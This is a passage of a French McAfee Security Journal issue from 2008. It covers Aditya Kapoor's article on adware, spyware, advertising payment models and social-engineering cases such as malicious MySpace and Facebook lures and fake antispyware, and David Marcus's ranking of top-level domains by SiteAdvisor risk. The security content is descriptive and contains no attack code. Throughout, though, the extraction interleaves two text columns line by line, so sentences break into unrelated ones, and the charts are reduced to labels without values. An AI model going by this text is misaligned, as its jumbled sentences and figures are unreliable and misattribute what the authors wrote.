exploiter le contenu saisi ou demandé (à partir des résultats pas de certaines activités en ligne. Les concepteurs de techniques
proposés par un moteur de recherche, p. ex.) pour diffuser d'ingénierie sociale aux intentions malveillants savent quant à eux
des publicités ciblées. Les publicités contextuelles de Google, très bien exploiter les faiblesses de la nature humaine. Une étude
notamment, fonctionnent sur le modèle du paiement au clic. de cas réalisée par le ministère de l'Intérieur américain révèle que
84 % des administrations américaines attribuent un certain nombre
Les mécanismes de diffusion les plus répandus de publicité par
de failles de sécurité à des erreurs humaines et 80 % les expliquent
paiement au clic sont les suivants :
par un manque de formation et de connaissances en matière de
t Bannières publicitaires Les publicités sont affichées sous sécurité ou à un non-respect des procédures mises en place12.
forme de bannières ou de zones délimitées. Leur contenu peut
Des centaines de milliers de logiciels malveillants font appel à des
être modifié régulièrement.
techniques d'ingénierie sociale pour pouvoir être installés sur les
t Fenêtres pop-up en avant ou en arrière plan Les publicités ordinateurs des utilisateurs : il s'agit de l'un des vecteurs les plus
sont affichées sous forme de fenêtres séparées, représentant courants dans la diffusion des logiciels malveillants. Matthew
une gêne pour l'utilisateur. Braveman classe les différents vecteurs d'installation en quatre
t Publicités au format Flash Ces publicités sont semblables catégories principales13. Selon ses travaux, près d'un tiers des
aux bannières publicitaires, à la différence que les publicités logiciels malveillants a été installé à la suite de l'utilisation de
sont animées et que leur contenu évolue. techniques d'ingénierie sociale.

Le modèle avec paiement au clic peut fonctionner de manière Les créateurs de logiciels espions et de logiciels publicitaires ont
bien plus contrôlée, dans la mesure où le responsable du site adopté de nombreuses techniques déjà populaires et ont développé
web hébergeant ces publicités peut en choisir le mécanisme de leurs propres techniques afin de diffuser leurs logiciels. L'ingénierie
diffusion. Bien que ce modèle soit basé sur le serveur et semble sociale est le vecteur d'installation le plus répandu du modèle avec
plus sûr pour l'utilisateur, il n'est pas dénué de risques. Certains paiement à l'installation, qui offre un nombre plus important de
arnaqueurs peuvent toujours utiliser des pratiques trompeuses possibilités de diffusion de logiciels espions et de logiciels publicitaires.
pour piéger les utilisateurs7. Ces applications peuvent être distribuées à l'aide de mécanismes
d'apparence inoffensifs, comme une offre groupée de logiciels
La plupart des contenus publicitaires étant stockés sur des gratuits ou à l'aide de mécanismes plus douteux, comme le spam ou
serveurs et faisant appel à des technologies de type JavaScript les pièces jointes à des messages électroniques au contenu trompeur.
et Flash notamment, l'insertion de publicités malveillantes à la Un utilisateur souhaitant installer un logiciel gratuit peut par exemple
source ne pose aucune difficulté8, 9. A titre d'exemple, un réseau installer un logiciel publicitaire en toute connaissance de cause
publicitaire détenu par Yahoo a pendant un certain temps afin de profiter gratuitement de services supplémentaires. Même si
diffusé sans le savoir des bannières publicitaires malveillantes l'installation d'un logiciel est effectuée par le biais d'un exploit ou de
ayant pour effet le téléchargement de chevaux de Troie sur les spam, les sociétés de sécurité peuvent ne pas le considérer comme
ordinateurs des utilisateurs. Dans ce cas particulier, les bannières malveillant si leur fournisseur affirme qu'il n'a joué aucun rôle dans la
étaient affichées sur des sites aussi populaires que MySpace et diffusion de son logiciel et que celui-ci est exploité par des tiers.
PhotoBucket. Ces publicités malveillantes avaient été intégrées au
réseau publicitaire de Yahoo sans être détectées. Il est également La plupart des contenus publicitaires étant stockés sur
arrivé que le système de clic soit corrompu par des techniques des serveurs et faisant appel à des technologies de type
d'empoisonnement du cache DNS10. Les utilisateurs ne sont
toutefois pas affectés directement dans ce cas ; les fournisseurs JavaScript et Flash notamment, l'insertion de publicités
d'accès et les serveurs publicitaires sont en effet plus vulnérables malveillantes à la source ne pose aucune difficulté.
à ce type de menace.
Pour réduire plus efficacement les vecteurs d'attaque exploitant La confiance au centre du problème
ces modèles de compensation, il est important d'examiner La figure 3 présente quatre scénarios d'exposition des utilisateurs à
rapidement le rôle que jouent les techniques d'ingénierie sociale un site pratiquant l'ingénierie sociale. Ce schéma très simple peut
sur un marché où le nombre d'opportunités de génération de nous permettre de comprendre les cas réels décrits ci-après. L'élément
revenus est quasiment illimité. essentiel à retenir est que plus le niveau de confiance est élevé,
plus les techniques d'ingénierie sociale se révèleront efficaces. Les
exemples nous permettront de mieux comprendre ces mécanismes.

40 McAFEE SECURITY JOURNAL


Site de réseau social
niveau de confiance élevé

Moteur de recherche
niveau de confiance bas Site web utilisant des techniques
d'ingénierie sociale (liens vers des
Utilisateur
Lien reçu par messagerie instantanée, fichiers MP3 gratuits, des vidéos
par e-mail ou par spam pour adultes, etc.)
niveau de confiance le plus faible

Lien reçu via le profil d'un ami sur un


site de réseau social, Google Bloc-notes
ou autre domaine de confiance
niveau de confiance élevé

Figure 3 : De nombreux vecteurs exposent les utilisateurs aux programmes indésirables et malveillants.

Cas nº 1 : Sites web de réseau social confiance très élevé puisque les utilisateurs visitaient des sites de
confiance qu'ils consultaient régulièrement.
Les sites web de réseau social représentent une véritable aubaine
en termes d'ingénierie sociale, dans la mesure où les personnes t En 2006, The Washington Post a dévoilé la présence d'une
qui s'y rendent cherchent soit à rester en contact avec des amis, bannière malveillante sur MySpace utilisée pour la diffusion
soit à s'en faire de nouveaux. Les concepteurs de technique d'un logiciel publicitaire et de chevaux de Troie auprès de
d'ingénierie sociale peuvent en profiter pour créer des liens et millions d'utilisateurs, par l'exploitation d'une défaillance au
développer le facteur confiance, comme illustré dans le 1er cadre niveau de Microsoft Windows Metafile ; cela ne nécessitait
de la figure 3, puisque cette catégorie de sites web bénéficie aucune intervention des utilisateurs17.
d'un niveau de confiance très élevé. t Nous assistons en 2008 à une augmentation du nombre
Un certain nombre d'attaques ont fait parler d'elles en exploitant de bannières publicitaires malveillantes. Le dernier incident
cette confiance pour installer des logiciels publicitaires sur les significatif, au moment où nous écrivons ces lignes, concernait
ordinateurs des utilisateurs : une publicité Flash sur le site usatoday.com18. Par une simple
visite sur la page d'accueil, les utilisateurs étaient assaillis par
t MySpace Adult Content Viewer (Visualiseur de contenu
divers logiciels malveillants et fausses alertes (technique populaire
pour adultes MySpace) (niveau de confiance : moyen). La
d'ingénierie sociale) les invitant à télécharger un faux outil
technique utilisée dans ce cas consistait à inciter les utilisateurs
de protection antispyware appelé Malware Alert. (Ce type de
à cliquer sur une fenêtre pop-up présentant des jeunes gens
programme malveillant peut aussi bien contenir des programmes
et portant un titre du type « I want to be loved » (Je veux
potentiellement indésirables que des chevaux de Troie.)
qu'on m'aime)14. En cliquant sur ces publicités, les utilisateurs
pouvaient télécharger le logiciel MySpace Adult Content, qui Cas nº 3 : Autres tactiques douteuses
apparemment téléchargeait lui-même un logiciel publicitaire.
t Usurpation d'adresses e-mail (niveau de confiance : faible).
t Vidéo YouTube frauduleuse sur MySpace (niveau de confiance : Cette tactique a par exemple été utilisée dans le cadre de
élevé). WebSense a indiqué en 2006 qu'une vidéo YouTube l'envoi d'e-mails à partir de fausses adresses eBay incluant un
frauduleuse apparaissait sur plusieurs faux profils MySpace15. lien vers un logiciel publicitaire19. Ces messages invoquaient
Tout utilisateur essayant de regarder cette vidéo se voyait un problème au niveau des informations de facturation et
proposer de procéder à l'installation de ZangoCash. demandaient aux utilisateurs de mettre à jour celles-ci en
t Application Facebook Secret Crush (niveau de confiance : très téléchargeant un logiciel.
élevé). En janvier 2008, Fortinet a publié un avertissement relatif t Fausses pages d'erreur (niveau de confiance : moyen). Certains
à un widget malveillant appelé « Secret Crush » qui tentait sites web affichaient de fausses pages d'erreur de type « Page
d'installer des logiciels publicitaires16. Cette technique d'ingénierie non trouvée » et proposaient à l'utilisateur de résoudre ce
sociale se basait sur l'envoi d'une invitation Facebook portant problème en téléchargeant un contrôle ActiveX qui avait pour
le titre « 1 secret crush invitation » (Vous avez un admirateur rôle d'installer WinFixer20.
secret). Après avoir accepté cette invitation, l'utilisateur devait
installer un widget afin de connaître l'identité de cet admirateur. t Spam lié à Google Bloc-notes (niveau de confiance : élevé).
Il était ensuite invité à l'envoyer à cinq amis avant de découvrir Certains arnaqueurs ont récemment eut recours à une nouvelle
enfin le nom de cette personne. Les internautes les plus crédules technique d'ingénierie sociale consistant à envoyer par e-mail
transféraient alors ce message à cinq autres personnes, participant des liens vers des pages Google Bloc-notes21. Ces liens suivaient
du même coup à la propagation d'un véritable ver social. Une fois le format suivant : www.google.com/notebook/public/[ID-
la procédure terminée, tout ce à quoi les utilisateurs avaient droit utilisateur]/[bloqué]. Le nom de domaine « google.com » met
était un message les invitant à télécharger le logiciel publicitaire les utilisateurs en confiance et les incite à cliquer sur des liens les
Zango. Cette technique a connu un grand succès dans la mesure amenant sur des pages web malveillantes, hébergeant elles-
où le niveau de confiance du site Facebook est très élevé. mêmes de nombreux liens vers des sites pour adultes ou de
fausses vidéos. Leur réel objectif est en fait d'amener l'utilisateur
Cas nº 2 : Bannières publicitaires à procéder au téléchargement de faux programmes antispyware.
Les bannières publicitaires fonctionnent sur le modèle avec
paiement au clic. Les bannières bénéficiaient d'un niveau de

AUTOMNE 2008 41
Une retraite silencieuse Les entreprises doivent immédiatement cesser l'utilisation de
programmes publicitaires ne respectant pas les conditions de
L'absence de législation régulant l'utilisation de logiciels espions l'accord établi ou leurs propres politiques d'utilisation des
et logiciels publicitaires a permis aux développeurs de bénéficier logiciels publicitaires. Dans la mesure où les annonceurs ont
d'une liberté totale, que leurs intentions soient purement vénales maintenant conscience des risques associés au modèle avec
ou réellement malveillantes. A première vue, il semblait que les paiement à l'installation (violation de la vie privée, vices du
utilisateurs étaient protégés par la présence d'un contrat de licence consentement, etc.), ils tendent à opter pour le modèle avec
les avertissant de possibles effets indésirables de ces applications. paiement au clic qui lui ne requiert l'installation d'aucun logiciel
Ces contrats étaient toutefois incomplets et obscurs, ou n'étaient sur l'ordinateur de l'utilisateur.
tout simplement pas affichés. Lorsqu'un utilisateur parvenait à les
consulter, ces contrats étaient généralement illisibles, présentés
dans des fenêtres trop petites n'affichant que quelques mots à
Applications malveillantes
la fois. Alors qu'ils semblaient favorisés par de tels stratagèmes, Parce que les auteurs de logiciels malveillants s'enrichissent
pourquoi les logiciels espions et logiciels publicitaires sont-il en facilement en jouant sur les peurs des utilisateurs, on assiste à
perte de puissance ? Plusieurs facteurs ont contribué à ce déclin. l'apparition d'une nouvelle tendance consistant à diffuser des
applications malveillantes et de fausses alertes relatives à des chevaux
t Poursuites judiciaires Suite à une augmentation des incidents
de Troie, affichant des messages d'erreur et d'infections visant à
imputés à des logiciels espions et logiciels publicitaires, de
tromper l'utilisateur. Dans la plupart des cas, ces fausses alertes
nombreux clients et autres parties ont porté plainte contre
d'infection par chevaux de Troie permettent en fait le téléchargement
certains grands distributeurs de logiciels malveillants22, 23, 24, 25, 26, 27.
d'applications malveillantes détectant de faux fichiers et clés de
Plusieurs décisions de justice ont permis de limiter leur Registre et les présentant comme des logiciels malveillants. Ces
prolifération. Lors du procès contre Zango12 par exemple, la applications copient parfois certains fichiers sur le système de
cour a exigé que cette société surveille ses distributeurs tiers afin l'utilisateur uniquement pour pouvoir les détecter par la suite ; elles
de s'assurer que l'ensemble de ses partenaires se conforment entrent dans la catégorie des chevaux de Troie (voir figure 4).
aux exigences de la Federal Trade Commission (FTC) — agence
Nous avons également constaté que les chevaux de Troie
fédérale américaine chargée de la protection des consommateurs
servaient souvent à installer des logiciels publicitaires.
et de la concurrence. Le tribunal a également interdit à Zango
Downloader-UA fait partie de la catégorie des chevaux de
d'exploiter, directement ou par l'intermédiaire de tiers, des
Troie qui font appel à des techniques d'ingénierie sociale
vulnérabilités de sécurité dans le but de télécharger des logiciels.
pour télécharger de faux programmes. Découverte en 2004,
De plus, il a exigé que la société indique de manière claire et
cette catégorie de chevaux de Troie exploite des vulnérabilités
précise ses conditions de divulgation et obtienne le consentement
de Microsoft Windows Media Player dans l'utilisation de la
exprès de l'utilisateur avant tout téléchargement de logiciel
technologie DRM (Digital Rights Management) et incite les
sur son ordinateur. Ce type de décision a permis de minimiser
utilisateurs à télécharger des fichiers spécialement développés
l'impact du modèle avec paiement à l'installation et a forcé les
à des fins malveillantes31,32. En 2008, un tel cheval de Troie a
distributeurs publicitaires à mettre de l'ordre dans leurs pratiques.
été utilisé pour amener les utilisateurs à télécharger un faux
t Prise de conscience du grand public et groupes sectoriels logiciel de lecture de fichiers MP3 intégrant une sélection de
La FTC met à la disposition des utilisateurs un site web chansons. Une fois installé, ce logiciel procédait lui-même au
d'informations28 offrant un certain nombre de conseils sur téléchargement nombreux logiciels publicitaires33.
la protection contre les logiciels espions et sur la meilleure
Par comparaison avec les années précédentes, la croissance
manière de signaler des abus. L'Anti-Spyware Coalition
du nombre d'applications malveillantes (programmes
propose également une mine d'informations sur ce type de
potentiellement indésirables et chevaux de Troie) s'est accentuée
menace29. Grâce aux efforts déployés par ces organisations,
de manière exponentielle en 2008 (voir figure 4).
consommateurs et législateurs bénéficient désormais d'une
meilleure compréhension des problèmes et des règles inhérents
à la publicité en ligne. Cette prise de conscience a également Applications malveillantes
permis de limiter l'apparition de ces applications indésirables.
1 000
t Mauvaise publicité et procès éventuels contre des
500
annonceurs ayant un lien avec des fournisseurs de
logiciels publicitaires Les fonds ayant permis de financer le 0
marché des logiciels espions et logiciels publicitaires proviennent 2005 2006 2007 2008
(estimation)
à l'origine des annonceurs recourant à des fournisseurs de
Programmes potentiellement indésirables
logiciels publicitaires pour diffuser leurs publicités. Ces sociétés
Chevaux de Troie
marchandes et de services n'avaient pas cherché à savoir dans le
détail de quelle manière les fournisseurs de logiciels publicitaires Figure 4 : Contrairement aux logiciels espions et logiciels publicitaires, le nombre
diffuseraient leurs annonces. Selon un jugement du d'applications malveillantes (programmes potentiellement indésirables et chevaux de
29 janvier 200730 qui a depuis fait jurisprudence, l'accord Troie) a augmenté de manière significative en 2008. (Source : McAfee Avert Labs)
indiquait qu'avant de faire appel à une société assurant la
diffusion de leurs publicités, puis de manière trimestrielle, toute
société se doit de s'enquérir des méthodes de diffusion utilisées.

42 McAFEE SECURITY JOURNAL


Conclusion
Une simple analyse statistique permet de se rendre compte
que la croissance du nombre de logiciels espions et de logiciels
publicitaires tend à s'essouffler. Les étonnantes techniques
d'ingénierie sociale utilisées pour diffuser ces programmes
potentiellement indésirables sont toutefois bien ancrées,
distribuant toujours des applications malveillantes et des
chevaux de Troie. Avec l'essor du modèle avec paiement au clic,
nul ne peut douter que de nouvelles techniques d'ingénierie
sociale verront bientôt le jour, incitant les utilisateurs à cliquer
sur des publicités et générant toujours plus de profits pour les
annonceurs. On peut également compter sur une augmentation
de la diffusion de logiciels publicitaires et de chevaux de Troie sur
les sites de réseau social. Bien que le nombre total de logiciels
espions et logiciels publicitaires ait baissé, aucune panacée
Figure 5 : De nombreux noms de domaine sont associés à une même adresse IP ne semble pouvoir enrayer à court terme la prolifération des
distribuant des applications malveillantes traduites.
programmes indésirables. Dans la mesure où les fournisseurs de
logiciels publicitaires paient pour chaque installation effectuée,
Pour mesurer la fréquence des faux logiciels antispyware distribués l'éthique voudrait qu'ils s'efforcent de garder une trace de
par le biais de chevaux de Troie, nous avons analysé un ensemble chaque installation et empêchent toute diffusion illégitime de
d'adresses IP utilisées pour leur téléchargement. Une requête leurs logiciels. Mais peut-on réellement espérer qu'ils le fassent ?
exécutée via hosts-files.net a permis de découvrir qu'une même
adresse IP était associée à 158 domaines différents34 (voir figure 5). Dans un monde où les menaces évoluent constamment et où les
chevaux de Troie lucratifs sont en plein essor, nous devons rester
Chacun des domaines répertoriés à la figure 5 propose soit un vigilants et former les travailleurs et particuliers afin qu'ils prennent
faux programme antispyware, soit une application malveillante conscience des dangers de ces techniques d'ingénierie sociale.
de « nettoyage » du système. Ces pages existent même en
plusieurs langues. Après une analyse de 620 pages, nous
avons identifié 24 langues différentes à la fois pour les pages
web et les applications proposées, ce qui montre bien que Aditya Kapoor est expert en recherche auprès
ces menaces ont depuis longtemps dépassé les frontières des de McAfee Avert Labs. Il a découvert l'ingénierie
pays de langue anglaise. Il s'est avéré qu'une même adresse inverse il y a six ans à l'université de Lafayette en
IP était souvent associée à plusieurs domaines, allant parfois Louisiane, en rédigeant son mémoire de maîtrise
jusqu'à 200 domaines différents. Une recherche à partir du sur un algorithme de désassemblage visant au
terme « FSA », utilisé par le site hosts-files.net pour décrire les démasquage de code. Chez McAfee, Kapoor
a développé ses compétences en analyse de
domaines hébergeant des applications malveillantes, a renvoyé
rootkits, en comparaison de code et en analyse
près de 3 600 résultats différents35. comportementale. Ses passions incluent les
voyages, ainsi que la découverte de cultures et
d'architectures de pays étrangers.

NOTES
1 http://www.antispywarecoalition.org/documents/2007glossary.htm 18 http://securitylabs.websense.com/content/Alerts/3061.aspx
2 OptOut, Gibson Research Corp — http://www.grc.com/optout.htm 19 http://securitylabs.websense.com/content/Alerts/738.aspx
3 http://en.wikipedia.org/wiki/Compensation_methods 20 http://www.avertlabs.com/research/blog/index.php/2006/12/04/
4 Source : Site web Zango — http://www.cdt.org/headlines/headlines.php?iid=51 404-not-just-file-not-found/
5 http://www.benedelman.org/news/062907-1.html 21 http://www.cantoni.org/2008/06/04/google-notebook-spam
6 http://en.wikipedia.org/wiki/Compensation_methods#Pay-per-click_.28PPC.29 22 http://www.benedelman.org/spyware/nyag-dr/
7 http://www.benedelman.org/ppc-scams/ 23 http://www.oag.state.ny.us/media_center/2005/apr/apr28a_05.html
8 http://msmvps.com/blogs/spywaresucks/archive/2007/08/22/1128996.aspx 24 http://www.internetlibrary.com/cases/lib_case358.cfm
9 http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/ 25 http://blogs.zdnet.com/Spyware/?p=655
10 http://www.secureworks.com/research/threats/ppc-hijack/ 26 http://www.ftc.gov/opa/2006/11/zango.shtm
11 http://www.csc.com/cscworld/012007/dep/fh001.shtml 27 http://www.ftc.gov/bcp/edu/microsites/spyware/law_enfor.htm
12 http://www.usgs.gov/conferences/presentations/5SocialEngineeringInternal 28 http://onguardonline.gov/spyware.html
ExternalThreat%20Dudeck.ppt 29 http://www.antispywarecoalition.org/
13 http://download.microsoft.com/download/c/e/c/cecd00b7-fe5e-4328-8400- 30 http://www.oag.state.ny.us/media_center/2007/jan/jan29b_07.html
2550c479f95d/Social_Engineering_Modeling.pdf 31 http://www.pcworld.com/article/119016/risk_your_pcs_health_for_a_song.html
14 http://mashable.com/2006/10/11/myspace-adult-content-viewer-more-adware/ 32 http://vil.nai.com/vil/content/v_130856.htm
15 http://securitylabs.websense.com/content/Alerts/1300.aspx 33 http://www.avertlabs.com/research/blog/index.php/2008/05/06/
16 http://www.fortiguardcenter.com/advisory/FGA-2007-16.html fake-mp3s-running-rampant/
17 http://blog.washingtonpost.com/securityfix/2006/07/ 34 http://hosts-file.net/?s=67.55.81.200&sDM=1#matches
myspace_ad_served_adware_to_mo.html 35 http://hosts-file.net/?s=Browse&f=FSA

AUTOMNE 2008 43
Quel niveau de
risque pour les
domaines de
premier niveau ?
David Marcus

Les données McAfee SiteAdvisor permettent d'étudier l'évolution


des risques dans le monde.
Dans son excellent article « Cartographie mise à jour du Web espérons que ces résultats vous permettront de naviguer plus
malveillant », publié dans le bulletin d'informations Perspectives sereinement. Pensez simplement à regarder où vous mettez les
McAfee sur la sécurité1 de juin 2008, notre collègue Shane Keats pieds avant de vous promener sur Internet.
a analysé en profondeur la répartition des sites web malveillants
sur Internet à partir de données recueillies grâce au logiciel Analyse des graphiques Dans le diagramme intitulé « Domaines
McAfee® SiteAdvisor®. De nos jours, les internautes souhaitent de premier niveau d'Europe, du Moyen-Orient et d'Afrique classés
pouvoir surfer et effectuer leurs recherches dans un environnement par profil de risque global », on peut voir que les domaines
entièrement sécurisé. Mais si l'on compare Internet à une immense roumains en .ro (barre à l'extrême gauche) représentent presque
ville numérique, comment savoir quels sont les quartiers qu'il 7 %. Selon le logiciel SiteAdvisor, cela signifie que McAfee a
est plus prudent d'éviter ? Quels domaines présentent le plus de constaté que près de 7 % des sites appartenant à ce domaine de
risques ? Quel domaine de premier niveau a fait le plus de progrès premier niveau ont présenté une ou plusieurs menaces, comme
en matière de sécurité ? Lequel est le plus à la traîne ? Certains des exploits de navigateur, des logiciels publicitaires, des logiciels
termes de recherche sont-ils plus risqués que d'autres ? espions, des chevaux de Troie ou des virus, du spam, des affiliations
à d'autres sites dangereux, des fenêtres pop-up agressives, ou ont
Les internautes se posent de plus en plus ce genre de questions. fait l'objet de commentaires de part de la communauté SiteAdvisor.
L'objectif de McAfee Security Journal est de vous apporter les Plus cette valeur est élevée, plus le risque s'avère important pour les
réponses à ces questions à l'aide d'analyses et de données concrètes, utilisateurs. Pour mettre ces valeurs en perspective, nous proposons
de sorte que vous puissiez prendre les meilleures décisions possible. sur le même graphique une courbe indiquant leur évolution par
rapport à l'année passée. Cette courbe montre qu'en Roumanie le
Dans la présente édition, nous avons compilé des informations risque a augmenté d'environ 1 %, alors qu'il a par exemple baissé
récentes sur les menaces liées aux domaines de premier niveau, qu'il de près de 3 % en Slovaquie. Les valeurs positives témoignent
s'agisse de domaines génériques (.com, .info ou .biz notamment) d'une augmentation des risques par rapport à l'année précédente
ou nationaux (dont .cn, .ru ou .br). Nous avons évalué les niveaux et les valeurs négatives indiquent une diminution des risques.
de risques actuels que présentent ces domaines sur le continent
américain, en Europe et en Asie, mais aussi analysé leur évolution
depuis l'année passée. Nous avons classé chaque domaine de David Marcus est responsable de la recherche en
premier niveau selon son profil de risque global, puis effectué une sécurité et de la communication chez McAfee Avert
analyse complémentaire en matière de pratiques de messagerie Labs. Il contribue à faire connaître la recherche
électronique, de sécurité des téléchargements et de la prévalence de pointe que mène Avert Labs auprès des clients
des exploits web. Nous avons ensuite dégagé les vingt domaines de McAfee et de la communauté des experts en
premier niveau qui se distinguaient pour chaque type de risque. sécurité. Marcus est actuellement responsable
des relations publiques et des médias, consultant
Les résultats se révèlent saisissants. Les données recueillies technologique, rédacteur en chef du blog McAfee
montrent clairement que les risques ne sont pas répartis Avert Labs Security Blog, mais aussi co-présentateur
uniformément sur Internet. Les domaines génériques et nationaux d'AudioParasitics, le podcast officiel de McAfee
Avert Labs. Outres ces nombreuses responsabilités,
présentent en effet des types et des degrés très variés de risques et
il gère également l'ensemble des publications
de dangers. Certains pays font preuve d'excellentes pratiques en
d'Avert Labs, dont ce McAfee Security Journal
matière de courrier électronique, par exemple, mais d'habitudes
déplorables lorsqu'il est question des téléchargements. D'autres
sont quant à eux de vrais nids à exploits et codes malicieux. Nous
NOTES
1 http://www.mcafee.com/us/security_insights/archived/june_2008/si_jun1_08.html

44 McAFEE SECURITY JOURNAL


Domaines de premier niveau d'Europe, du Moyen-Orient et d'Afrique classés par profil de risque global
8% Evolution du risque
entre 2007 et 2008
6%
(par point)
4% Risque global
2% en 2008

0%
-2 %
-4 %
Roumanie .ro
Russie .ru
Ukraine .ua
Union européenne .eu
Iran .ir
Espagne .es
Bulgarie .bg
Italie .it
France .fr
Lettonie .lv
Pologne .pl
Hongrie .hu
République tchèque .cz
Suisse .ch
Belgique .be
Turquie .tr
Slovaquie .sk
Israël .il
Allemagne .de
Lituanie .lt
Estonie .ee
Autriche .at
Portugal .pt
Pays-Bas .nl
Croatie .hr
Afrique du Sud .za
Royaume-Uni .uk
Yougoslavie .yu
Grèce .gr
Suède .se
Irlande .ie
Danemark .dk
Islande .is
Slovénie .si
Norvège .no
Finlande .fi
Domaines de premier niveau d'Asie classés par profil de risque global
20 % Evolution du risque
entre 2007 et 2008
18 %
(par point)
16 %
Risque global en 2008
14 %
12 %
10 %
8%
6%
4%
2%
0%
-2 %
-4 %
-6 %
-8 %
-10 %
Hong-Kong .hk

République populaire de Chine .cn

Philippines .ph

Iles Cocos (Keeling) .cc

Îles Samoa .ws

Inde .in

Corée du Sud .kr

Tuvalu .tv

Tonga .to

Viêt Nam .vn

Ile Christmas .cx

Taïwan (République de Chine) .tw

Tokélaou .tk

Nioué .nu

Thaïlande .th

Vanuatu .vu

Indonésie .id

Malaisie .my

Nouvelle-Zélande .nz

Singapour .sg

Australie .au

Japon .jp

Domaines de premier niveau du continent américain Critères de risque utilisés pour l'évaluation
classés par profil de risque global des domaines de premier niveau
2,5 % Evolution du risque Exploits de navigateurs
entre 2007 et 2008
2%
(par point)
1,5 %
Risque global en 2008
1% Logiciels publicitaires, Volume important
chevaux de Troie, d'e-mails commerciaux
0,5 % logiciels espions, virus

0%
-0,5 %
-1 % Affiliation avec Fenêtres pop-up
d'autres sites agressives
-1,5 % dangereux
Etats-Unis .us

Argentine .ar

Brésil .br

Mexique .mx

Chili .cl

Canada .ca

Venezuela .ve

Colombie .co

Commentaires et avis publiés


par la communauté SiteAdvisor

AUTOMNE 2008 45
-5 %
0%
5%
10 %
15 %
20 %
25 %

46
-0,4 %
-0,2 %
0%
0,2 %
0,4 %
0,6 %
0,8 %
1%
1,2 %
-20 %
-10 %
0%
10 %
20 %
30 %
40 %
50 %
60 %
70 %
Roumanie .ro Informations .info Informations .info

Informations .info République populaire de Chine .cn Roumanie .ro

Nioué .nu Hong-Kong .hk Iles Samoa .ws

République populaire de Chine .cn Réseau .net Entreprises .biz

Russie .ru Russie .ru République populaire de Chine .cn

McAFEE SECURITY JOURNAL


Entreprises .biz Corée du Sud .kr Italie .it

Individus .name Entreprises .biz Individus .name

Iles Cocos (Keeling) .cc Taïwan (République de Chine) .tw Bulgarie .bg

Croatie .hr Commercial .com Belgique .be

Tonga .to Iles Samoa .ws Iles Cocos (Keeling) .cc

Ukraine .ua Yougoslavie .yu Tonga .to

Viêt Nam .vn Ukraine .ua Tuvalu .tv

Inde .in Thaïlande .th Réseau .net


Classement des domaines de premier niveau par pratiques en matière d'e-mail

Réseau .net Iles Cocos (Keeling) .cc Commercial .com

Portugal .pt Slovaquie .sk Etats-Unis .us

Iles Samoa .ws Croatie .hr Tokélaou .tk

Pologne .pl Union européenne .eu Ile Christmas .cx

Classement des 20 domaines de premier niveau présentant le plus grand nombre d'exploits
Etats-Unis .us Bulgarie .bg Lettonie .lv

Commercial .com Inde .in Israël .il


Classement des 20 domaines de premier niveau présentant le plus grand risque en termes de téléchargements

Hong-Kong .hk Lettonie .lv Viêt Nam .vn


en 2008

en 2008
en 2008
(par point)

(par point)
(par point)
Risque global

Risque global
Risque global
entre 2007 et 2008
Evolution du risque

entre 2007 et 2008


Evolution du risque
entre 2007 et 2008
Evolution du risque
AUTOMNE 2008 47
McAfee, Inc.
Tour Franklin
La Défense 8
92042 Paris La Défense Cedex
France
+33.1.47.62.56.00 (standard)
www.mcafee.com/fr

McAfee et/ou les autres marques citées dans ce document


sont des marques commerciales ou des marques commerciales
déposées de McAfee, Inc. et/ou de ses sociétés affiliées aux Etats-
Unis et/ou dans d'autres pays. La couleur rouge McAfee utilisée
pour identifier des fonctionnalités liées à la sécurité est propre
aux produits de la marque McAfee. Toutes les autres marques
commerciales déposées ou non déposées citées dans ce document
sont la propriété exclusive de leurs détenteurs respectifs.
© 2008 McAfee, Inc. Tous droits réservés.
48 McAFEE SECURITY JOURNAL
5001_sec-jrnl_fall08